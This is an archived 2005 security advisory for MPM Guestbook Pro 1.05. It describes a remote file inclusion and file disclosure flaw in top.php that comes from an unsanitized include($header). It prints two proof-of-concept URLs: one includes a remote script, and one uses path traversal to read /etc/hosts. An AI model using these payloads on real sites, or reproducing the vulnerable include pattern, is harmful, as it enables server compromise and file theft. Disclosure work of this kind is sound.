ss11012005.txt

2005-01-16T00:00:00
ID PACKETSTORM:35747
Type packetstorm
Reporter SmOk3
Modified 2005-01-16T00:00:00

Description

                                        
                                            `__ ___/____ __________ /____________ _____ ___/______________ _____________   
_____ \__ / / /_ ___/ __/ _ \_ __ `__ \____ \_ _ \ ___/ / / /_ ___/ _ \  
____/ /_ /_/ /_(__ )/ /_ / __/ / / / / /___/ // __/ /__ / /_/ /_ / / __/  
/____/ _\__, / /____/ \__/ \___//_/ /_/ /_//____/ \___/\___/ \__,_/ /_/ \___/   
/____/   
  
____________________ _  
_ __ \_ ___/_ __ `/  
___/ /_/ / / _ /_/ /   
_(_)____//_/ _\__, /   
/____/   
  
  
Ref: SS#11012005  
SYSTEMSECURE.ORG - Advisory/Exploit  
  
* PUBLIC ADVISORY *  
  
Software:  
MPM Guestbook Pro 1.05 (maybe all versions)  
  
Link:  
http://mpm.pahviloota.net/  
  
Attacks:  
Remote File Include and File Disclusore  
  
Discovered by:  
SmOk3 [smok3f00@gmail.com]  
  
Vendor:  
Warned about this vulnerability  
  
  
-- ! Description !--  
  
MPM Guestbook Pro is a famous php Guestbook system. This script allows malicious users to include  
arbitrary script code from remote. This may expose sensitive information and compromise the entire  
system. The problem is in the file "top.php", in the first lines:  
  
<?php include($header); ?>  
  
PoC: /gbpro/top.php?header=http://[CMD]  
  
  
Also, you can view any file in the system, due to file disclure on the same variable.  
  
PoC: /gbpro/top.php?header=../../../../../../../etc/hosts  
  
  
  
-- ! Solution !--  
  
No patch available yet.  
  
  
  
  
<base64>Rm9y52EgUG9ydHVnYWw=</base64>  
  
-EOF-`